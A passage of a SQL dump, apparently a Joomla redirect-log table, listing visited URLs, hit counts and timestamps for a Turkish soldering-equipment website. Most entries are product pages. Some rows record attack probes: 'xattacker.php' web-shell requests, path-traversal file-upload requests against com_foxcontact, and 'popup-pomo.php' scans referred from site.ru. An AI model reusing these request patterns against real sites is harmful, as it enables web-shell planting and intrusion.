00:00:00',301),(13173,'http://www.3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,product_name?language=en-gb',NULL,'','',1,0,'2017-11-21 22:54:46','0000-00-00 00:00:00',301),(13174,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,pc.ordering,product_name/dirdesc',NULL,'','',3,0,'2017-11-21 23:03:10','0000-00-00 00:00:00',301),(13175,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/dirdesc?language=en-gb',NULL,'','',17,0,'2017-11-21 23:07:52','0000-00-00 00:00:00',301),(13176,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,`p`.product_sku/dirdesc/results,1-20',NULL,'','',5,0,'2017-11-21 23:08:28','0000-00-00 00:00:00',301),(13177,'http://3s-technologies.com.tr/en/products/spartan-8s-8d-44-detail?tmpl=component&print=1',NULL,'','',20,0,'2017-11-21 23:11:44','0000-00-00 00:00:00',301),(13178,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/by?language=en-gb&mf_name',NULL,'','',1,0,'2017-11-21 23:13:24','0000-00-00 00:00:00',301),(13179,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',176,0,'2017-11-21 23:13:46','0000-00-00 00:00:00',301),(13180,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/kester',NULL,'','',17,0,'2017-11-21 23:15:32','0000-00-00 00:00:00',301),(13181,'http://3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by,category_name?language=en-gb',NULL,'','',11,0,'2017-11-21 23:15:50','0000-00-00 00:00:00',301),(13182,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,ordering/results,1-10',NULL,'','',3,0,'2017-11-21 23:19:03','0000-00-00 00:00:00',301),(13183,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/dirdesc?language=en-gb',NULL,'','',5,0,'2017-11-21 23:20:36','0000-00-00 00:00:00',301),(13184,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-33-34-detail/askquestion?tmpl=component',NULL,'','',14,0,'2017-11-21 23:27:43','0000-00-00 00:00:00',301),(13185,'http://3s-technologies.com.tr/tr/styles/popup-pomo.php',NULL,'http://site.ru','',7,0,'2017-11-21 23:29:03','0000-00-00 00:00:00',301),(13186,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,`p`.product_sku/results,1-50',NULL,'','',5,0,'2017-11-22 00:06:42','0000-00-00 00:00:00',301),(13187,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,`p`.product_sku/results,1-10',NULL,'','',3,0,'2017-11-22 00:12:00','0000-00-00 00:00:00',301),(13188,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.4mm-29-detail',NULL,'','',15,0,'2017-11-22 00:15:00','0000-00-00 00:00:00',301),(13189,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/by,category_name/dirdesc',NULL,'','',6,0,'2017-11-22 00:15:48','0000-00-00 00:00:00',301),(13190,'http://3s-technologies.com.tr/tr/revision/popup-pomo.php',NULL,'http://site.ru','',3,0,'2017-11-22 00:17:33','0000-00-00 00:00:00',301),(13191,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-hız/by,`p`.product_sku/results,1-10',NULL,'','',9,0,'2017-11-22 00:27:52','0000-00-00 00:00:00',301),(13192,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/jvk-detail/askquestion?tmpl=component',NULL,'','',30,0,'2017-11-22 00:32:33','0000-00-00 00:00:00',301),(13193,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/avb_1_150x150.jpg',NULL,'','',1,0,'2017-11-22 00:43:16','0000-00-00 00:00:00',301),(13194,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,`p`.product_sku/dirdesc/results,1-10',NULL,'','',1,0,'2017-11-22 00:43:45','0000-00-00 00:00:00',301),(13195,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,ordering/results,1-50',NULL,'','',1,0,'2017-11-22 00:49:04','0000-00-00 00:00:00',301),(13196,'http://3s-technologies.com.tr/tr/network/popup-pomo.php',NULL,'http://site.ru','',9,0,'2017-11-22 01:03:21','0000-00-00 00:00:00',301),(13197,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,`p`.product_sku/results,1-20',NULL,'','',4,0,'2017-11-22 01:04:56','0000-00-00 00:00:00',301),(13198,'http://3s-technologies.com.tr/index.php/en/using-joomla/extensions/templates/beez-2/home-page-beez-2/81-english-uk/english-content/85-kester-lehimleme-malzemeleri',NULL,'','',7,0,'2017-11-22 01:11:05','0000-00-00 00:00:00',301),(13199,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/dirdesc/results,1-40',NULL,'','',2,0,'2017-11-22 01:20:49','0000-00-00 00:00:00',301),(13200,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/dirdesc?language=en-gb',NULL,'','',5,0,'2017-11-22 01:34:32','0000-00-00 00:00:00',301),(13201,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/thru-hole/by,product_sku',NULL,'','',1,0,'2017-11-22 01:37:37','0000-00-00 00:00:00',301),(13202,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/dirdesc',NULL,'','',37,0,'2017-11-22 01:42:43','0000-00-00 00:00:00',301),(13203,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,ordering?language=en-gb',NULL,'','',2,0,'2017-11-22 01:46:43','0000-00-00 00:00:00',301),(13204,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,`p`.product_sku/dirdesc/results,1-50',NULL,'','',4,0,'2017-11-22 01:52:36','0000-00-00 00:00:00',301),(13205,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,pc.ordering,product_name/results,1-5',NULL,'','',1,0,'2017-11-22 02:19:03','0000-00-00 00:00:00',301),(13206,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/by,product_sku',NULL,'','',42,0,'2017-11-22 02:32:31','0000-00-00 00:00:00',301),(13207,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,category_name/dirdesc/results,1-5?language=en-gb',NULL,'','',4,0,'2017-11-22 02:34:56','0000-00-00 00:00:00',301),(13208,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36:orta-hizli&itemid=37&layout=default&lang=en',NULL,'','',9,0,'2017-11-22 02:45:31','0000-00-00 00:00:00',301),(13209,'http://3s-technologies.com.tr/index.php/tr/ueruenler/spr-20-41-42-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-11-22 03:04:41','0000-00-00 00:00:00',301),(13210,'http://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,`p`.product_sku?language=en-gb',NULL,'','',2,0,'2017-11-22 03:04:44','0000-00-00 00:00:00',301),(13211,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.4mm-29-detail',NULL,'','',25,0,'2017-11-22 03:15:51','0000-00-00 00:00:00',301),(13212,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/dalga-lehim/by,product_sku',NULL,'','',3,0,'2017-11-22 03:33:07','0000-00-00 00:00:00',301),(13213,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar',NULL,'','',2,0,'2017-11-22 03:36:36','0000-00-00 00:00:00',301),(13214,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=90&itemid=102&lang=tr',NULL,'','',3,0,'2017-11-22 03:49:02','0000-00-00 00:00:00',301),(13215,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,pc.ordering,product_name/results,1-20',NULL,'','',6,0,'2017-11-22 03:59:38','0000-00-00 00:00:00',301),(13216,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/dirdesc',NULL,'','',1,0,'2017-11-22 04:07:35','0000-00-00 00:00:00',301),(13217,'http://3s-technologies.com.tr/tr/discussion/popup-pomo.php',NULL,'http://site.ru','',9,0,'2017-11-22 04:21:17','0000-00-00 00:00:00',301),(13218,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/results,1-10',NULL,'','',9,0,'2017-11-22 04:29:43','0000-00-00 00:00:00',301),(13219,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-22 04:34:55','0000-00-00 00:00:00',301),(13220,'http://www.3s-technologies.com.tr/en/wp-content/themes/ut-strange/addpress/css/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/ut-strange/addpress/css/style.css','',4,0,'2017-11-22 04:42:59','0000-00-00 00:00:00',301),(13221,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/dirdesc',NULL,'','',2,0,'2017-11-22 05:08:53','0000-00-00 00:00:00',301),(13222,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,mf_name/dirdesc/results,1-10',NULL,'','',3,0,'2017-11-22 05:21:49','0000-00-00 00:00:00',301),(13223,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,pc.ordering,product_name/results,1-10',NULL,'','',1,0,'2017-11-22 05:26:34','0000-00-00 00:00:00',301),(13224,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/screen-printer/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-11-22 05:28:21','0000-00-00 00:00:00',301),(13225,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer',NULL,'','',23,0,'2017-11-22 05:29:29','0000-00-00 00:00:00',301),(13226,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/by,`p`.product_sku?language=en-gb',NULL,'','',7,0,'2017-11-22 05:30:27','0000-00-00 00:00:00',301),(13227,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/rl132-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-11-22 05:57:36','0000-00-00 00:00:00',301),(13228,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/by,ordering/results,1-100',NULL,'','',6,0,'2017-11-22 05:59:43','0000-00-00 00:00:00',301),(13229,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,category_name/dirdesc/results,1-10?language=en-gb',NULL,'','',3,0,'2017-11-22 06:09:11','0000-00-00 00:00:00',301),(13230,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,category_name?language=en-gb',NULL,'','',2,0,'2017-11-22 06:11:39','0000-00-00 00:00:00',301),(13231,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,mf_name/dirdesc/results,1-50',NULL,'','',3,0,'2017-11-22 06:37:37','0000-00-00 00:00:00',301),(13232,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,pc.ordering,product_name/results,1-50',NULL,'','',4,0,'2017-11-22 06:42:21','0000-00-00 00:00:00',301),(13233,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/245-sn63pb37-0.6mm-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-11-22 06:45:22','0000-00-00 00:00:00',301),(13234,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/by,product_sku',NULL,'','',42,0,'2017-11-22 06:56:33','0000-00-00 00:00:00',301),(13235,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/results,1-50',NULL,'','',8,0,'2017-11-22 07:01:17','0000-00-00 00:00:00',301),(13236,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/by,category_name/results,1-20',NULL,'','',4,0,'2017-11-22 07:06:02','0000-00-00 00:00:00',301),(13237,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/by,product_name/dirdesc?language=tr-tr',NULL,'','',25,0,'2017-11-22 07:11:31','0000-00-00 00:00:00',301),(13238,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2017-11-22 07:14:20','0000-00-00 00:00:00',301),(13239,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-ultra-hız/by,category_name',NULL,'','',1,0,'2017-11-22 07:22:13','0000-00-00 00:00:00',301),(13240,'http://3s-technologies.com.tr/en/products/temizleme-makineleri/by,pc.ordering,product_name/dirdesc/results,1-5',NULL,'','',1,0,'2017-11-22 07:24:58','0000-00-00 00:00:00',301),(13241,'http://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,product_sku?language=tr-tr',NULL,'','',1,0,'2017-11-22 07:30:05','0000-00-00 00:00:00',301),(13242,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,category_name/dirdesc/results,1-5',NULL,'','',6,0,'2017-11-22 07:34:27','0000-00-00 00:00:00',301),(13243,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/by,pc.ordering,product_name/results,1-100',NULL,'','',14,0,'2017-11-22 07:58:08','0000-00-00 00:00:00',301),(13244,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,pc.ordering,product_name/dirdesc/results,1-10?language=en-gb',NULL,'','',3,0,'2017-11-22 08:12:21','0000-00-00 00:00:00',301),(13245,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/dirdesc?language=en-gb',NULL,'','',4,0,'2017-11-22 08:17:05','0000-00-00 00:00:00',301),(13246,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,product_name?language=en-gb',NULL,'','',1,0,'2017-11-22 08:25:19','0000-00-00 00:00:00',301),(13247,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,category_name/dirdesc/results,1-20',NULL,'','',1,0,'2017-11-22 08:40:46','0000-00-00 00:00:00',301),(13248,'http://3s-technologies.com.tr/en/products/temizleme-makineleri/by,pc.ordering,product_name/dirdesc/results,1-10',NULL,'','',3,0,'2017-11-22 08:50:14','0000-00-00 00:00:00',301),(13249,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,product_sku?language=en-gb',NULL,'','',1,0,'2017-11-22 09:13:27','0000-00-00 00:00:00',301),(13250,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,category_name/dirdesc/results,1-50',NULL,'','',1,0,'2017-11-22 09:32:52','0000-00-00 00:00:00',301),(13251,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/jvk-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-11-22 09:35:39','0000-00-00 00:00:00',301),(13252,'http://3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/by,category_name?language=tr-tr',NULL,'','',7,0,'2017-11-22 10:01:58','0000-00-00 00:00:00',301),(13253,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/screen-printer/by,category_name/dirdesc?language=tr-tr',NULL,'','',25,0,'2017-11-22 10:05:08','0000-00-00 00:00:00',301),(13254,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,mf_name?language=en-gb',NULL,'','',4,0,'2017-11-22 10:24:58','0000-00-00 00:00:00',301),(13255,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,mf_name?language=tr-tr',NULL,'','',1,0,'2017-11-22 10:32:38','0000-00-00 00:00:00',301),(13256,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-22 10:42:24','0000-00-00 00:00:00',301),(13257,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,mf_name/dirdesc?language=en-gb',NULL,'','',7,0,'2017-11-22 10:42:29','0000-00-00 00:00:00',301),(13258,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,category_name/dirdesc/results,1-20',NULL,'','',1,0,'2017-11-22 11:02:51','0000-00-00 00:00:00',301),(13259,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/dirdesc',NULL,'','',403,0,'2017-11-22 11:11:35','0000-00-00 00:00:00',301),(13260,'http://www.3s-technologies.com.tr/tr/joomla/images/pdf/dalgalehimlemeprosesiweb.pdf',NULL,'','',44,0,'2017-11-22 11:12:20','0000-00-00 00:00:00',301),(13261,'http://3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47:aoi&itemid=1&layout=default&lang=en',NULL,'','',6,0,'2017-11-22 11:17:04','0000-00-00 00:00:00',301),(13262,'http://www.3s-technologies.com.tr/en/products/dalga-lehim/spartan-8s-8d-44-detail/askquestion?tmpl=component',NULL,'','',29,0,'2017-11-22 11:24:29','0000-00-00 00:00:00',301),(13263,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,`p`.product_sku/results,1-50',NULL,'','',5,0,'2017-11-22 11:24:45','0000-00-00 00:00:00',301),(13264,'http://3s-technologies.com.tr/index.php/tr/ueruenler/245-sn63pb37-0.8mm-detail?tmpl=component&print=1',NULL,'','',14,0,'2017-11-22 11:46:49','0000-00-00 00:00:00',301),(13265,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/by,mf_name',NULL,'','',397,0,'2017-11-22 11:46:50','0000-00-00 00:00:00',301),(13266,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/spr-20-41-detail?tmpl=component&print=1',NULL,'','',26,0,'2017-11-22 11:52:23','0000-00-00 00:00:00',301),(13267,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,`p`.product_sku/results,1-20',NULL,'','',3,0,'2017-11-22 11:54:58','0000-00-00 00:00:00',301),(13268,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,product_sku?language=en-gb',NULL,'','',3,0,'2017-11-22 12:09:10','0000-00-00 00:00:00',301),(13269,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by,category_name?language=en-gb',NULL,'','',24,0,'2017-11-22 12:09:50','0000-00-00 00:00:00',301),(13270,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/by,ordering',NULL,'','',533,0,'2017-11-22 12:13:22','0000-00-00 00:00:00',301),(13271,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,`p`.product_sku/results,1-10',NULL,'','',1,0,'2017-11-22 12:15:15','0000-00-00 00:00:00',301),(13272,'http://3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/245-k100-28-29-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-11-22 12:23:26','0000-00-00 00:00:00',301),(13273,'http://3s-technologies.com.tr/en/products/smd-ultra-hız/dirdesc',NULL,'','',397,0,'2017-11-22 12:40:43','0000-00-00 00:00:00',301),(13274,'http://www.3s-technologies.com.tr/tr/registration.html',NULL,'http://www.3s-technologies.com.tr/tr/registration.html','',1,0,'2017-11-22 13:13:33','0000-00-00 00:00:00',301),(13275,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,category_name/results,1-20',NULL,'','',1,0,'2017-11-22 13:29:42','0000-00-00 00:00:00',301),(13276,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,product_name?language=tr-tr',NULL,'','',2,0,'2017-11-22 13:39:56','0000-00-00 00:00:00',301),(13277,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,`p`.product_sku?language=tr-tr',NULL,'','',1,0,'2017-11-22 13:46:01','0000-00-00 00:00:00',301),(13278,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,pc.ordering,product_name/results,1-5',NULL,'','',3,0,'2017-11-22 13:58:07','0000-00-00 00:00:00',301),(13279,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,`p`.product_sku/results,1-20',NULL,'','',2,0,'2017-11-22 14:17:04','0000-00-00 00:00:00',301),(13280,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-22 14:17:52','0000-00-00 00:00:00',301),(13281,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,product_name/results,1-100',NULL,'','',3,0,'2017-11-22 14:21:48','0000-00-00 00:00:00',301),(13282,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/screen-printer/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',25,0,'2017-11-22 14:36:29','0000-00-00 00:00:00',301),(13283,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,mf_name/dirdesc/results,1-5',NULL,'','',5,0,'2017-11-22 14:40:44','0000-00-00 00:00:00',301),(13284,'http://www.3s-technologies.com.tr/tr/rss.xml',NULL,'','',87,0,'2017-11-22 14:44:19','0000-00-00 00:00:00',301),(13285,'http://www.3s-technologies.com.tr/tr/xattacker.gif',NULL,'','',87,0,'2017-11-22 14:44:20','0000-00-00 00:00:00',301),(13286,'http://www.3s-technologies.com.tr/tr/images/xattacker.txt',NULL,'','',87,0,'2017-11-22 14:44:22','0000-00-00 00:00:00',301),(13287,'http://www.3s-technologies.com.tr/tr/images/jdownloads/screenshots/xattacker.php.j?x=attacker',NULL,'','',87,0,'2017-11-22 14:44:22','0000-00-00 00:00:00',301),(13288,'http://www.3s-technologies.com.tr/tr/media/xattacker.php?x=attacker',NULL,'','',87,0,'2017-11-22 14:44:23','0000-00-00 00:00:00',301),(13289,'http://www.3s-technologies.com.tr//components/com_foxcontact/lib/file-uploader.php?cid={}&mid={}&qqfile=/../../_func.php',NULL,'','',87,0,'2017-11-22 14:44:23','0000-00-00 00:00:00',301),(13290,'http://www.3s-technologies.com.tr//components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../_func.php',NULL,'','',87,0,'2017-11-22 14:44:24','0000-00-00 00:00:00',301),(13291,'http://www.3s-technologies.com.tr/tr/components/com_foxcontact/_func.php?x=attacker',NULL,'','',8,0,'2017-11-22 14:44:24','0000-00-00 00:00:00',301),(13292,'http://www.3s-technologies.com.tr/tr/tmp/plupload/xattacker.html',NULL,'','',87,0,'2017-11-22 14:44:25','0000-00-00 00:00:00',301),(13293,'http://www.3s-technologies.com.tr/tr/index.php?option=com_myblog&task=ajaxupload',NULL,'','',72,0,'2017-11-22 14:44:25','0000-00-00 00:00:00',301),(13294,'http://www.3s-technologies.com.tr/tr/images/xattacker.gif',NULL,'','',87,0,'2017-11-22 14:44:27','0000-00-00 00:00:00',301),(13295,'http://www.3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/xattacker.php?x=attacker',NULL,'','',87,0,'2017-11-22 14:44:27','0000-00-00 00:00:00',301),(13296,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&itemid=121&lang=tr',NULL,'','',6,0,'2017-11-22 14:54:58','0000-00-00 00:00:00',301),(13297,'http://www.3s-technologies.com.tr/index.php/en/products/flux/by,product_name?language=en-gb',NULL,'','',24,0,'2017-11-22 15:01:07','0000-00-00 00:00:00',301),(13298,'http://3s-technologies.com.tr/en/products/thru-hole/dirdesc',NULL,'','',18,0,'2017-11-22 15:18:17','0000-00-00 00:00:00',301),(13299,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,pc.ordering,product_name/results,1-20',NULL,'','',1,0,'2017-11-22 15:24:35','0000-00-00 00:00:00',301),(13300,'http://www.3s-technologies.com.tr/tr/registration',NULL,'http://www.3s-technologies.com.tr/tr/registration','',16,0,'2017-11-22 15:37:27','0000-00-00 00:00:00',301),(13301,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,pc.ordering,product_name/dirdesc',NULL,'','',4,0,'2017-11-22 15:40:03','0000-00-00 00:00:00',301),(13302,'http://3s-technologies.com.tr/tr/libraries/joomla/template/mark.php',NULL,'http://site.ru','',12,0,'2017-11-22 15:49:01','0000-00-00 00:00:00',301),(13303,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,`p`.product_sku/results,1-10',NULL,'','',4,0,'2017-11-22 15:53:40','0000-00-00 00:00:00',301),(13304,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_sku/results,1-5',NULL,'','',1,0,'2017-11-22 15:58:40','0000-00-00 00:00:00',301),(13305,'http://www.3s-technologies.com.tr/en/products/dalga-lehim/by,mf_name/dirdesc/results,1-5',NULL,'','',1,0,'2017-11-22 16:21:09','0000-00-00 00:00:00',301),(13306,'http://www.3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/by,category_name',NULL,'','',215,0,'2017-11-22 16:30:53','0000-00-00 00:00:00',301),(13307,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,product_name',NULL,'','',9,0,'2017-11-22 16:33:42','0000-00-00 00:00:00',301),(13308,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,mf_name/dirdesc/results,1-50',NULL,'','',3,0,'2017-11-22 16:36:35','0000-00-00 00:00:00',301),(13309,'http://www.3s-technologies.com.tr/index.php/en/homepage2/81-english-uk/english-content/85-kester-lehimleme-malzemeleri',NULL,'','',25,0,'2017-11-22 16:39:22','0000-00-00 00:00:00',301),(13310,'http://3s-technologies.com.tr/index.php/en/products/krem-lehim/by,ordering?language=en-gb',NULL,'','',14,0,'2017-11-22 16:59:19','0000-00-00 00:00:00',301),(13311,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/screen-printer/by,mf_name?language=tr-tr',NULL,'','',7,0,'2017-11-22 16:59:34','0000-00-00 00:00:00',301),(13312,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,pc.ordering,product_name/results,1-50',NULL,'','',1,0,'2017-11-22 17:02:18','0000-00-00 00:00:00',301),(13313,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,mf_name',NULL,'','',9,0,'2017-11-22 17:53:17','0000-00-00 00:00:00',301),(13314,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_name/results,1-5',NULL,'','',4,0,'2017-11-22 17:58:52','0000-00-00 00:00:00',301),(13315,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,product_name/dirdesc?language=en-gb',NULL,'','',8,0,'2017-11-22 18:09:22','0000-00-00 00:00:00',301),(13316,'http://3s-technologies.com.tr/en/products/thru-hole/av132-detail/askquestion?tmpl=component',NULL,'','',17,0,'2017-11-22 18:17:25','0000-00-00 00:00:00',301),(13317,'http://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/by,ordering?language=tr-tr',NULL,'','',7,0,'2017-11-22 18:26:00','0000-00-00 00:00:00',301),(13318,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/by,category_name/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-11-22 18:29:20','0000-00-00 00:00:00',301),(13319,'http://3s-technologies.com.tr/tr/menus/popup-pomo.php',NULL,'http://site.ru','',88,0,'2017-11-22 18:36:54','0000-00-00 00:00:00',301),(13320,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,`p`.product_sku',NULL,'','',2,0,'2017-11-22 18:37:11','0000-00-00 00:00:00',301),(13321,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,pc.ordering,product_name/results,1-10',NULL,'','',4,0,'2017-11-22 18:40:02','0000-00-00 00:00:00',301),(13322,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/screen-printer/by,product_name',NULL,'','',8,0,'2017-11-22 18:47:05','0000-00-00 00:00:00',301),(13323,'http://3s-technologies.com.tr/tr/urunler/spr-20-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-11-22 18:58:00','0000-00-00 00:00:00',301),(13324,'http://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim',NULL,'','',25,0,'2017-11-22 19:02:16','0000-00-00 00:00:00',301),(13325,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/dalga-lehim/by,pc.ordering,product_name/results,1-5',NULL,'','',1,0,'2017-11-22 19:10:52','0000-00-00 